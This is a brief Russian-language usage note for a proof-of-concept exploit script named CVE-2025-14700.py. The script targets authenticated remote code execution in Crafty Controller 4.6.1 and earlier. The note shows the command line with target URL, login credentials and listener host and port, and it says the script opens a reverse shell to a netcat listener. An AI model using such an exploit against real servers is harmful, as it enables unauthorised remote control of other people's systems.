
Концепт-эксплойт для аутентифицированной RCE в Crafty Controller <= 4.6.1
Использование:
./CVE-2025-14700.py --url <crafty_controller_host> --login <username> --password <password> --lhost <listener_host> --lport <listener_port>
Этот скрипт использует netcat для настройки слушателя после запуска полезной нагрузки reverse shell; он не будет работать, если на вашей машине-слушателе нет netcat.